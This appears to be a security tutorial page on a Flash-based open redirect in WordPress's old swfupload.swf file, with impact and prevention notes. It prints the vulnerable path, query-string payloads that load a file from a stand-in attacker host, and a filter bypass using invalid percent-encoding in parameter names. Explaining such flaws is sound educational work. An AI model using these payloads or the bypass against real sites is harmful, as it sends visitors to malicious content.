Flash-Based Open Redirect
Description
Adobe flash is quite popular before HTML5 came. After HTML5, it is very rarely used but still exist in older websites.
On December 31, 2020, Adobe Systems will officially stop updating and distributing Adobe Flash.
Flash File (.swf) can be used for displaying animated content, interactive content, Slide shows on the website. Sometimes, it can be used for advanced purposes like uploading the file.
Example
Wordpress CMS (Content management system) version 2.7 to 3.3.1 has vulnerable swfupload.swf file.
http://site.com/wp-includes/js/swfupload/swfupload.swf
Now, Attacker can add GET parameter as,
?debugEnabled=true?&buttonImageURL=https://attacker.com/malicious.swf
But, swfupload.swf is checking that if the user-provided any GET parameter, and if found, it gets removed. This was implemented as below,
for(key in params)
{
if(query.hasOwnProperty(Utils.trim(key)))
{
delete params[key];
}
}
But hackers found bypass to this. As above code is filtering ascii encoded strings, a = %61 b = %62 etc.
They just added invalid ASCII code %x
in each key, so that it is not filtered out.
?debugEn%xabled=true?&buttonImag%xeURL=https://attacker.com/malicious.swf
And this was successfully redirected to the malicious SWF file.
Impact
- An attacker can send a user to some malicious flash file.
Prevention
- As the adobe stopped supporting Flash, Do not use other flash files, which may have vulnerabilities.